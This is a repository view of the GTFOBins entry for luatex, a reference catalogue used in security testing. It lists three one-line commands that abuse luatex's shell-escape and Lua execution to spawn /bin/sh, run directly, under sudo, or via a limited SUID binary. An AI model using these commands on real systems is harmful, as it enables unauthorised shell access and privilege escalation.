This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
7e2e18830517324ce15930883ea437de205c1212
GTFOBins.github.io
/
_gtfobins
/
luatex.md
Andrea Cardaci
21b641911e
Fix and improve TeX binaries and GNU Octave
2021-04-26 16:07:59 +02:00
344 B
Raw
Blame
History
description, functions
description
functions
This allows to execute [`lua`](/gtfobins/lua/) code.
shell
sudo
limited-suid
code
luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
code
sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
code
./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
Reference in New Issue
View Git Blame
Copy Permalink